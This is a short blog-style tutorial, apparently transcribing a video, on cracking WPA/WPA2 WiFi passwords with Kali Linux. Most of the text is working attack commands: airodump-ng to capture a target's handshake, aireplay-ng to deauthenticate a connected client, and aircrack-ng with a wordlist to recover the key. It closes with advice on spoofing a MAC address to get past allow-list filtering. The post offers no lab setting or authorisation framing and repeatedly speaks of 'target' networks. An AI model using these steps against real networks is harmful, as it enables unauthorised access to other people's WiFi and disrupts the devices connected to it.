How To Crack Wpa Wpa2 Wifi

July 17, 2015 by admin

This video is intended to show you How To Crack Wpa Wpa2 Wifi using Kali Linux
Cracking Wpa Wpa2 Wireless Network can take some time using a CPU like we will be doing in this video a faster way would to use hashcat and use our GPU problem is you kinda need a really good GPU to do it that's just the way I feel I might be wrong though! You will need Kali Linux



You will need a Compatible Wireless card I recommend these Compatible Wireless Cards:
Compatible Wireless Cards: Alfa Networks AWUS036H - Works! Alfa Network AWUS036NH - Untested! TP-LINK TL-WN722N - Works!
Getting a low signal to the target network?
Order a WiFi signal amplifier: WiFi signal amplifier Signal gain could be increased by -20 dbi.

Let's get started!

First we need to find out what wireless cards are connected by typing:
00:53
iwconfig Next we need to bring our wireless card down:
1:15
ifconfig wlan0 down
Once our wireless card is down we need to run the command
1:22
airodump-ng wlan0 This will show us all the wireless networks within range.
Let the airodump-ng run till you find the target network.
2:00 When you found the target network press and hold CTRL+C to stop airodump-ng
We need to remember the BSSID and the Channel the target network is on.
2:17
airodump-ng -c 1 --bssid BC:F6:85:BF:4F:70 -w filename wlan0 replace 1 with your targets channel and replace BC:F6:85:BF:4F:70 with your targets BSSID.
You honestly should replace filename with the name of the target ESSID name for each network you target.
2:50 airodump-ng command is just listening to connections on the target router.
We need a mac address to show up under the station if nothing shows up under the station we can't go any further in the steps need a device to be connected to that target network over wireless so we can deauth it and capture the 4 way handshake.
3:16 we run the aireplay-ng command to deauth a client connected to the target network.
aireplay-ng -0 1 -a BC:F6:85:BF:4F:70 -c D8:50:E6:84:6C:74 wlan0
-0 is the Deauth attack. 1 = number of Deauth to sent to the target connected. -a = BSSID of target network. -c = target mac address under the station. 5:09 WPA Handshake captured!
5:48
aircrack-ng -w /path/to/wordlist /path/to/capfile-01.cap Since were using our CPU this can take some time depending on how big your wordlist is you might not even get the wireless password if its not in the wordlist try a wps attack if this attack fails try a pixiewps attack might work but not always.
6:25 WPA password cracked! KEY FOUND!
6:40 We need to put the card into managed mode but first we need to run
7:01
ifconfig wlan0 down
Then run
7:11
iwconfig wlan0 mode managed Next we need to bring the wireless card back up since its down.
7:16
ifconfig wlan0 up Find the target network connect to it using the password you got if you cracked it.

If you're unable to connect to the network and the password is 100% correct its very very possible the target has Mac address filtering security so only mac address that are in a allow list can connect this is extra security some people use but its a simple bypass if you spoof your mac address with a connected client.

Last edited by Matthew Knight on July 15, 2015 at 1:45 am